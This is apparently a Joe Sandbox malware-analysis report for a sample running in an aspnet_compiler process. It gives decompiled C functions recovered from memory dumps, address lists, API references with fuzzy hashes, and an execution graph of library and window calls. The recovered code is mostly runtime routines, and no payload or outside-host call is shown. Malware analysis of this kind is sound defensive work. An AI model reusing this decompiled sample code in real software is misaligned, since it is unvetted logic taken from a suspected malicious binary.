                                                                                                                                                                                                                                                                  0x10006465
                                                                                                                                                                                                                                                                  0x1000646a
                                                                                                                                                                                                                                                                  0x1000644a
                                                                                                                                                                                                                                                                  0x1000644a
                                                                                                                                                                                                                                                                  0x1000644d
                                                                                                                                                                                                                                                                  0x1000644e
                                                                                                                                                                                                                                                                  0x10006450
                                                                                                                                                                                                                                                                  0x10006452
                                                                                                                                                                                                                                                                  0x10006454
                                                                                                                                                                                                                                                                  0x10006459
                                                                                                                                                                                                                                                                  0x10006459
                                                                                                                                                                                                                                                                  0x1000646d
                                                                                                                                                                                                                                                                  0x1000646f
                                                                                                                                                                                                                                                                  0x10006471
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10006477
                                                                                                                                                                                                                                                                  0x1000647a
                                                                                                                                                                                                                                                                  0x1000647c
                                                                                                                                                                                                                                                                  0x1000647e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10006480
                                                                                                                                                                                                                                                                  0x10006480
                                                                                                                                                                                                                                                                  0x10006483
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10006483
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000647e
                                                                                                                                                                                                                                                                  0x10006562
                                                                                                                                                                                                                                                                  0x10006565
                                                                                                                                                                                                                                                                  0x1000656a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000656d
                                                                                                                                                                                                                                                                  0x10006400
                                                                                                                                                                                                                                                                  0x10006400
                                                                                                                                                                                                                                                                  0x10006407
                                                                                                                                                                                                                                                                  0x10006408
                                                                                                                                                                                                                                                                  0x1000640a
                                                                                                                                                                                                                                                                  0x1000640f
                                                                                                                                                                                                                                                                  0x1000656e
                                                                                                                                                                                                                                                                  0x10006572
                                                                                                                                                                                                                                                                  0x10006572
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1000655C
                                                                                                                                                                                                                                                                    • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                                                                                                                    • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CurrentTerminate_free
                                                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                                                  • API String ID: 4125551430-3972193922
                                                                                                                                                                                                                                                                  • Opcode ID: 5092f4ca4a4756f4876969a66ee6608d1777889df8d2fda28f15207f5f445cf0
                                                                                                                                                                                                                                                                  • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5092f4ca4a4756f4876969a66ee6608d1777889df8d2fda28f15207f5f445cf0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E100016AA(intOrPtr __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				short _v10;
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				char _v24;
                                                                                                                                                                                                                                                                  				void* _t23;
                                                                                                                                                                                                                                                                  				intOrPtr _t26;
                                                                                                                                                                                                                                                                  				void* _t27;
                                                                                                                                                                                                                                                                  				void* _t30;
                                                                                                                                                                                                                                                                  				void* _t32;
                                                                                                                                                                                                                                                                  				intOrPtr _t37;
                                                                                                                                                                                                                                                                  				intOrPtr* _t38;
                                                                                                                                                                                                                                                                  				void* _t39;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v24 = 0x203a;
                                                                                                                                                                                                                                                                  				_v22 = 0;
                                                                                                                                                                                                                                                                  				_t30 = __edx;
                                                                                                                                                                                                                                                                  				_v18 = 0;
                                                                                                                                                                                                                                                                  				_t37 = __ecx;
                                                                                                                                                                                                                                                                  				_v14 = 0;
                                                                                                                                                                                                                                                                  				_v10 = 0;
                                                                                                                                                                                                                                                                  				_v8 = __ecx;
                                                                                                                                                                                                                                                                  				_v16 = 0xa0d;
                                                                                                                                                                                                                                                                  				E10002DB0(__edx,  &_v16, 4);
                                                                                                                                                                                                                                                                  				E10004550(_t30, _a12);
                                                                                                                                                                                                                                                                  				E10004550(_t30,  &_v24);
                                                                                                                                                                                                                                                                  				_t32 = 2;
                                                                                                                                                                                                                                                                  				_t23 = 9;
                                                                                                                                                                                                                                                                  				_t33 =  !=  ? _t23 : _t32;
                                                                                                                                                                                                                                                                  				_t39 = ( !=  ? _t23 : _t32) + _a4;
                                                                                                                                                                                                                                                                  				_t38 = _t37 + _t39;
                                                                                                                                                                                                                                                                  				if( *_t38 > 0x2d) {
                                                                                                                                                                                                                                                                  					_t26 =  *_t38;
                                                                                                                                                                                                                                                                  					while(_t26 < 0x7f) {
                                                                                                                                                                                                                                                                  						_t27 = E100044B0(_t30);
                                                                                                                                                                                                                                                                  						_t39 = _t39 + 1;
                                                                                                                                                                                                                                                                  						 *((char*)(_t27 + _t30)) =  *_t38;
                                                                                                                                                                                                                                                                  						_t38 = _t39 + _v8;
                                                                                                                                                                                                                                                                  						_t26 =  *_t38;
                                                                                                                                                                                                                                                                  						if(_t26 > 0x2d) {
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L4;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L4:
                                                                                                                                                                                                                                                                  				return _t39;
                                                                                                                                                                                                                                                                  			}


















                                                                                                                                                                                                                                                                  0x100016b3
                                                                                                                                                                                                                                                                  0x100016bb
                                                                                                                                                                                                                                                                  0x100016be
                                                                                                                                                                                                                                                                  0x100016c0
                                                                                                                                                                                                                                                                  0x100016c4
                                                                                                                                                                                                                                                                  0x100016c6
                                                                                                                                                                                                                                                                  0x100016c9
                                                                                                                                                                                                                                                                  0x100016d4
                                                                                                                                                                                                                                                                  0x100016d7
                                                                                                                                                                                                                                                                  0x100016dd
                                                                                                                                                                                                                                                                  0x100016e6
                                                                                                                                                                                                                                                                  0x100016f0
                                                                                                                                                                                                                                                                  0x100016fe
                                                                                                                                                                                                                                                                  0x10001701
                                                                                                                                                                                                                                                                  0x10001702
                                                                                                                                                                                                                                                                  0x10001708
                                                                                                                                                                                                                                                                  0x1000170b
                                                                                                                                                                                                                                                                  0x10001710
                                                                                                                                                                                                                                                                  0x10001712
                                                                                                                                                                                                                                                                  0x10001714
                                                                                                                                                                                                                                                                  0x10001719
                                                                                                                                                                                                                                                                  0x1000171f
                                                                                                                                                                                                                                                                  0x10001725
                                                                                                                                                                                                                                                                  0x1000172a
                                                                                                                                                                                                                                                                  0x1000172d
                                                                                                                                                                                                                                                                  0x10001731
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10001731
                                                                                                                                                                                                                                                                  0x10001714
                                                                                                                                                                                                                                                                  0x10001734
                                                                                                                                                                                                                                                                  0x10001739

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                                                                                                                  • String ID: : $Se.
                                                                                                                                                                                                                                                                  • API String ID: 4218353326-4089948878
                                                                                                                                                                                                                                                                  • Opcode ID: 16249526efd136480c6f30b330c3e3e4df24dc84220866d278381164decd9af7
                                                                                                                                                                                                                                                                  • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16249526efd136480c6f30b330c3e3e4df24dc84220866d278381164decd9af7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                                                                                                                                  			E10001EDE(void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                  				intOrPtr _v0;
                                                                                                                                                                                                                                                                  				char _v20;
                                                                                                                                                                                                                                                                  				void* _t9;
                                                                                                                                                                                                                                                                  				intOrPtr _t10;
                                                                                                                                                                                                                                                                  				intOrPtr _t14;
                                                                                                                                                                                                                                                                  				void* _t19;
                                                                                                                                                                                                                                                                  				void* _t20;
                                                                                                                                                                                                                                                                  				char* _t21;
                                                                                                                                                                                                                                                                  				void* _t23;
                                                                                                                                                                                                                                                                  				void* _t24;
                                                                                                                                                                                                                                                                  				void* _t26;
                                                                                                                                                                                                                                                                  				void* _t27;
                                                                                                                                                                                                                                                                  				void* _t30;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t23 = __esi;
                                                                                                                                                                                                                                                                  				_t19 = __ecx;
                                                                                                                                                                                                                                                                  				_t26 = _t24;
                                                                                                                                                                                                                                                                  				_push(_t26);
                                                                                                                                                                                                                                                                  				_t27 = _t30;
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					_push(_v0);
                                                                                                                                                                                                                                                                  					_t9 = E100047E5(_t19);
                                                                                                                                                                                                                                                                  					_pop(_t20);
                                                                                                                                                                                                                                                                  					if(_t9 != 0) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t10 = E1000474F(_t20, _t23, __eflags, _v0);
                                                                                                                                                                                                                                                                  					_pop(_t19);
                                                                                                                                                                                                                                                                  					__eflags = _t10;
                                                                                                                                                                                                                                                                  					if(_t10 == 0) {
                                                                                                                                                                                                                                                                  						__eflags = _v0 - 0xffffffff;
                                                                                                                                                                                                                                                                  						if(_v0 != 0xffffffff) {
                                                                                                                                                                                                                                                                  							_push(_t27);
                                                                                                                                                                                                                                                                  							_t27 = _t30;
                                                                                                                                                                                                                                                                  							_t30 = _t30 - 0xc;
                                                                                                                                                                                                                                                                  							E10002837( &_v20);
                                                                                                                                                                                                                                                                  							E100035D2( &_v20, 0x10012164);
                                                                                                                                                                                                                                                                  							asm("int3");
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_push(_t27);
                                                                                                                                                                                                                                                                  						_t21 =  &_v20;
                                                                                                                                                                                                                                                                  						E1000286A(_t21);
                                                                                                                                                                                                                                                                  						E100035D2( &_v20, 0x100121b8);
                                                                                                                                                                                                                                                                  						asm("int3");
                                                                                                                                                                                                                                                                  						_t14 =  *((intOrPtr*)(_t21 + 4));
                                                                                                                                                                                                                                                                  						__eflags = _t14;
                                                                                                                                                                                                                                                                  						if(_t14 == 0) {
                                                                                                                                                                                                                                                                  							return 0x1000d180;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						return _t14;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L11:
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t9;
                                                                                                                                                                                                                                                                  				goto L11;
                                                                                                                                                                                                                                                                  			}
















                                                                                                                                                                                                                                                                  0x10001ede
                                                                                                                                                                                                                                                                  0x10001ede
                                                                                                                                                                                                                                                                  0x10001ee1
                                                                                                                                                                                                                                                                  0x1000222f
                                                                                                                                                                                                                                                                  0x10002230
                                                                                                                                                                                                                                                                  0x10002241
                                                                                                                                                                                                                                                                  0x10002241
                                                                                                                                                                                                                                                                  0x10002244
                                                                                                                                                                                                                                                                  0x10002249
                                                                                                                                                                                                                                                                  0x1000224c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10002237
                                                                                                                                                                                                                                                                  0x1000223c
                                                                                                                                                                                                                                                                  0x1000223d
                                                                                                                                                                                                                                                                  0x1000223f
                                                                                                                                                                                                                                                                  0x10002250
                                                                                                                                                                                                                                                                  0x10002254
                                                                                                                                                                                                                                                                  0x100028ec
                                                                                                                                                                                                                                                                  0x100028ed
                                                                                                                                                                                                                                                                  0x100028ef
                                                                                                                                                                                                                                                                  0x100028f5
                                                                                                                                                                                                                                                                  0x10002903
                                                                                                                                                                                                                                                                  0x10002908
                                                                                                                                                                                                                                                                  0x10002908
                                                                                                                                                                                                                                                                  0x10002909
                                                                                                                                                                                                                                                                  0x1000290f
                                                                                                                                                                                                                                                                  0x10002912
                                                                                                                                                                                                                                                                  0x10002920
                                                                                                                                                                                                                                                                  0x10002925
                                                                                                                                                                                                                                                                  0x10002926
                                                                                                                                                                                                                                                                  0x10002929
                                                                                                                                                                                                                                                                  0x1000292b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000292d
                                                                                                                                                                                                                                                                  0x10002932
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000223f
                                                                                                                                                                                                                                                                  0x1000224f
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                                                                                                                    • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                  • Opcode ID: 1700194a420cc3f1079efa773f9addc1f0a0c6e031eb70c12c8bf485ce408cf1
                                                                                                                                                                                                                                                                  • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1700194a420cc3f1079efa773f9addc1f0a0c6e031eb70c12c8bf485ce408cf1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:6.7%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:9.3%
                                                                                                                                                                                                                                                                  Signature Coverage:1.5%
                                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:81
                                                                                                                                                                                                                                                                  execution_graph 37744 4419a4 37745 44199f 37744->37745 37745->37744 37753 431671 37745->37753 37748 4418e2 37749 4418ea 37748->37749 37776 4414a9 12 API calls 37748->37776 37750 442bd4 37750->37749 37777 441409 memset 37750->37777 37754 431697 37753->37754 37773 4316d7 37753->37773 37755 4316e8 37754->37755 37759 4316ab 37754->37759 37754->37773 37757 4316f5 37755->37757 37765 4316df 37755->37765 37779 4169a7 11 API calls 37757->37779 37758 431903 37787 42c02e memset 37758->37787 37760 4316c1 37759->37760 37759->37765 37759->37773 37778 4169a7 11 API calls 37760->37778 37780 415a91 37765->37780 37766 431911 37766->37748 37766->37749 37766->37750 37768 431759 memcpy 37772 431787 37768->37772 37769 4318a7 37785 4172c8 memset 37769->37785 37774 43179b 37772->37774 37784 4169a7 11 API calls 37772->37784 37786 42c02e memset 37773->37786 37774->37769 37775 431877 memcpy 37774->37775 37775->37769 37775->37774 37776->37749 37777->37750 37778->37773 37779->37773 37781 415a9d 37780->37781 37782 415ab3 37781->37782 37783 415aa4 memset 37781->37783 37782->37768 37782->37773 37783->37782 37784->37774 37785->37773 37786->37758 37787->37766 37788 44dea5 37789 44deb5 FreeLibrary 37788->37789 37790 44dec3 37788->37790 37789->37790 37791 4287c1 37793 4287d2 37791->37793 37823 429ac1 37791->37823 37792 4259da 37854 416760 11 API calls 37792->37854 37794 428818 37793->37794 37795 42881f 37793->37795 37805 425711 37793->37805 37828 42013a 37794->37828 37856 420244 97 API calls 37795->37856 37798 4259c2 37824 425ad6 37798->37824 37848 415c56 11 API calls 37798->37848 37801 4260dd 37855 424251 120 API calls 37801->37855 37805->37792 37805->37798 37806 429a4d 37805->37806 37809 422aeb memset memcpy memcpy 37805->37809 37814 4260a1 37805->37814 37805->37823 37827 425a38 37805->37827 37844 4227f0 memset memcpy 37805->37844 37845 422b84 15 API calls 37805->37845 37846 422b5d memset memcpy memcpy 37805->37846 37847 422640 13 API calls 37805->37847 37849 4241fc 11 API calls 37805->37849 37850 42413a 90 API calls 37805->37850 37811 429a66 37806->37811 37812 429a9b 37806->37812 37809->37805 37857 415c56 11 API calls 37811->37857 37813 429a96 37812->37813 37859 416760 11 API calls 37812->37859 37860 424251 120 API calls 37813->37860 37853 415c56 11 API calls 37814->37853 37821 429a7a 37858 416760 11 API calls 37821->37858 37823->37824 37861 415c56 11 API calls 37823->37861 37827->37798 37851 422640 13 API calls 37827->37851 37852 4226e0 12 API calls 37827->37852 37829 42014c 37828->37829 37832 420151 37828->37832 37871 41e466 97 API calls 37829->37871 37831 420162 37831->37805 37832->37831 37833 4201b3 37832->37833 37834 420229 37832->37834 37835 4201b8 37833->37835 37836 4201dc 37833->37836 37834->37831 37837 41fd5e 86 API calls 37834->37837 37862 41fbdb 37835->37862 37836->37831 37841 4201ff 37836->37841 37868 41fc4c 37836->37868 37837->37831 37841->37831 37843 42013a 97 API calls 37841->37843 37843->37831 37844->37805 37845->37805 37846->37805 37847->37805 37848->37792 37849->37805 37850->37805 37851->37827 37852->37827 37853->37792 37854->37801 37855->37824 37856->37805 37857->37821 37858->37813 37859->37813 37860->37823 37861->37792 37863 41fbf1 37862->37863 37864 41fbf8 37862->37864 37867 41fc39 37863->37867 37886 4446ce 11 API calls 37863->37886 37876 41ee26 37864->37876 37867->37831 37872 41fd5e 37867->37872 37869 41ee6b 86 API calls 37868->37869 37870 41fc5d 37869->37870 37870->37836 37871->37832 37875 41fd65 37872->37875 37873 41fdab 37873->37831 37874 41fbdb 86 API calls 37874->37875 37875->37873 37875->37874 37877 41ee41 37876->37877 37878 41ee32 37876->37878 37887 41edad 37877->37887 37890 4446ce 11 API calls 37878->37890 37881 41ee3c 37881->37863 37884 41ee58 37884->37881 37892 41ee6b 37884->37892 37886->37867 37896 41be52 37887->37896 37890->37881 37891 41eb85 11 API calls 37891->37884 37893 41ee70 37892->37893 37894 41ee78 37892->37894 37952 41bf99 86 API calls 37893->37952 37894->37881 37897 41be6f 37896->37897 37898 41be5f 37896->37898 37903 41be8c 37897->37903 37917 418c63 37897->37917 37931 4446ce 11 API calls 37898->37931 37901 41bee7 37902 41be69 37901->37902 37935 41a453 86 API calls 37901->37935 37902->37881 37902->37891 37903->37901 37903->37902 37904 41bf3a 37903->37904 37906 41bed1 37903->37906 37934 4446ce 11 API calls 37904->37934 37908 41bef0 37906->37908 37910 41bee2 37906->37910 37908->37901 37909 41bf01 37908->37909 37911 41bf24 memset 37909->37911 37913 41bf14 37909->37913 37932 418a6d memset memcpy memset 37909->37932 37921 41ac13 37910->37921 37911->37902 37933 41a223 memset memcpy memset 37913->37933 37916 41bf20 37916->37911 37920 418c72 37917->37920 37918 418c94 37918->37903 37919 418d51 memset memset 37919->37918 37920->37918 37920->37919 37922 41ac52 37921->37922 37923 41ac3f memset 37921->37923 37926 41ac6a 37922->37926 37936 41dc14 19 API calls 37922->37936 37924 41acd9 37923->37924 37924->37901 37927 41aca1 37926->37927 37937 41519d 37926->37937 37927->37924 37929 41acc0 memset 37927->37929 37930 41accd memcpy 37927->37930 37929->37924 37930->37924 37931->37902 37932->37913 37933->37916 37934->37901 37936->37926 37940 4175ed 37937->37940 37948 417570 SetFilePointer 37940->37948 37943 41760a ReadFile 37944 417637 37943->37944 37945 417627 GetLastError 37943->37945 37946 4151b3 37944->37946 37947 41763e memset 37944->37947 37945->37946 37946->37927 37947->37946 37949 4175b2 37948->37949 37950 41759c GetLastError 37948->37950 37949->37943 37949->37946 37950->37949 37951 4175a8 GetLastError 37950->37951 37951->37949 37952->37894 37953 417bc5 37954 417c61 37953->37954 37959 417bda 37953->37959 37955 417bf6 UnmapViewOfFile CloseHandle 37955->37955 37955->37959 37957 417c2c 37957->37959 37965 41851e 20 API calls 37957->37965 37959->37954 37959->37955 37959->37957 37960 4175b7 37959->37960 37961 4175d6 FindCloseChangeNotification 37960->37961 37962 4175c8 37961->37962 37963 4175df 37961->37963 37962->37963 37964 4175ce Sleep 37962->37964 37963->37959 37964->37961 37965->37957 37966 415304 ??3@YAXPAX 37967 4152c6 malloc 37968 4152e2 37967->37968 37969 4152ef 37967->37969 37971 416760 11 API calls 37969->37971 37971->37968 37972 4232e8 37973 4232ef 37972->37973 37976 415b2c 37973->37976 37975 423305 37977 415b42 37976->37977 37981 415b46 37976->37981 37978 415b94 37977->37978 37979 415b5a 37977->37979 37977->37981 37983 4438b5 37978->37983 37979->37981 37982 415b79 memcpy 37979->37982 37981->37975 37982->37981 37984 4438d0 37983->37984 37994 4438c9 37983->37994 37997 415378 memcpy memcpy 37984->37997 37994->37981 37998 44660a 38001 4465e4 37998->38001 38000 446613 38002 4465f3 __dllonexit 38001->38002 38003 4465ed _onexit 38001->38003 38002->38000 38003->38002 38004 4466f4 38023 446904 38004->38023 38006 446700 GetModuleHandleA 38009 446710 __set_app_type __p__fmode __p__commode 38006->38009 38008 4467a4 38010 4467ac __setusermatherr 38008->38010 38011 4467b8 38008->38011 38009->38008 38010->38011 38024 4468f0 _controlfp 38011->38024 38013 4467bd _initterm __wgetmainargs _initterm 38014 44681e GetStartupInfoW 38013->38014 38015 446810 38013->38015 38017 446866 GetModuleHandleA 38014->38017 38025 41276d 38017->38025 38021 446896 exit 38022 44689d _cexit 38021->38022 38022->38015 38023->38006 38024->38013 38026 41277d 38025->38026 38068 4044a4 LoadLibraryW 38026->38068 38028 412785 38060 412789 38028->38060 38076 414b81 38028->38076 38031 4127c8 38082 412465 memset ??2@YAPAXI 38031->38082 38033 4127ea 38094 40ac21 38033->38094 38038 412813 38112 40dd07 memset 38038->38112 38039 412827 38117 40db69 memset 38039->38117 38042 412822 38138 4125b6 ??3@YAXPAX 38042->38138 38044 40ada2 _wcsicmp 38045 41283d 38044->38045 38045->38042 38048 412863 CoInitialize 38045->38048 38122 41268e 38045->38122 38142 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38048->38142 38052 41296f 38144 40b633 38052->38144 38054 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38059 412957 38054->38059 38065 4128ca 38054->38065 38059->38042 38060->38021 38060->38022 38061 4128d0 TranslateAcceleratorW 38062 412941 GetMessageW 38061->38062 38061->38065 38062->38059 38062->38061 38063 412909 IsDialogMessageW 38063->38062 38063->38065 38064 4128fd IsDialogMessageW 38064->38062 38064->38063 38065->38061 38065->38063 38065->38064 38066 41292b TranslateMessage DispatchMessageW 38065->38066 38067 41291f IsDialogMessageW 38065->38067 38066->38062 38067->38062 38067->38066 38069 4044f7 38068->38069 38070 4044cf GetProcAddress 38068->38070 38074 404507 MessageBoxW 38069->38074 38075 40451e 38069->38075 38071 4044e8 FreeLibrary 38070->38071 38072 4044df 38070->38072 38071->38069 38073 4044f3 38071->38073 38072->38071 38073->38069 38074->38028 38075->38028 38077 414b8a 38076->38077 38078 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38076->38078 38148 40a804 memset 38077->38148 38078->38031 38081 414b9e GetProcAddress 38081->38078 38083 4124e0 38082->38083 38084 412505 ??2@YAPAXI 38083->38084 38085 412521 38084->38085 38086 41251c 38084->38086 38159 444722 38085->38159 38170 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38086->38170 38093 41259b wcscpy 38093->38033 38175 40b1ab ??3@YAXPAX ??3@YAXPAX 38094->38175 38096 40ad76 38176 40aa04 38096->38176 38099 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38102 40ac5c 38099->38102 38100 40ad4b 38100->38096 38199 40a9ce 38100->38199 38102->38096 38102->38099 38102->38100 38103 40ace7 ??3@YAXPAX 38102->38103 38179 40a8d0 38102->38179 38191 4099f4 38102->38191 38103->38102 38107 40a8d0 7 API calls 38107->38096 38108 40ada2 38109 40adc9 38108->38109 38110 40adaa 38108->38110 38109->38038 38109->38039 38110->38109 38111 40adb3 _wcsicmp 38110->38111 38111->38109 38111->38110 38204 40dce0 38112->38204 38114 40dd3a GetModuleHandleW 38209 40dba7 38114->38209 38118 40dce0 3 API calls 38117->38118 38119 40db99 38118->38119 38281 40dae1 38119->38281 38295 402f3a 38122->38295 38124 412766 38124->38042 38124->38048 38125 4126d3 _wcsicmp 38126 4126a8 38125->38126 38126->38124 38126->38125 38128 41270a 38126->38128 38330 4125f8 7 API calls 38126->38330 38128->38124 38298 411ac5 38128->38298 38139 4125da 38138->38139 38140 4125f0 38139->38140 38141 4125e6 DeleteObject 38139->38141 38143 40b1ab ??3@YAXPAX ??3@YAXPAX 38140->38143 38141->38140 38142->38054 38143->38052 38145 40b640 38144->38145 38146 40b639 ??3@YAXPAX 38144->38146 38147 40b1ab ??3@YAXPAX ??3@YAXPAX 38145->38147 38146->38145 38147->38060 38149 40a83b GetSystemDirectoryW 38148->38149 38150 40a84c wcscpy 38148->38150 38149->38150 38155 409719 wcslen 38150->38155 38153 40a881 LoadLibraryW 38154 40a886 38153->38154 38154->38078 38154->38081 38156 409724 38155->38156 38157 409739 wcscat LoadLibraryW 38155->38157 38156->38157 38158 40972c wcscat 38156->38158 38157->38153 38157->38154 38158->38157 38160 444732 38159->38160 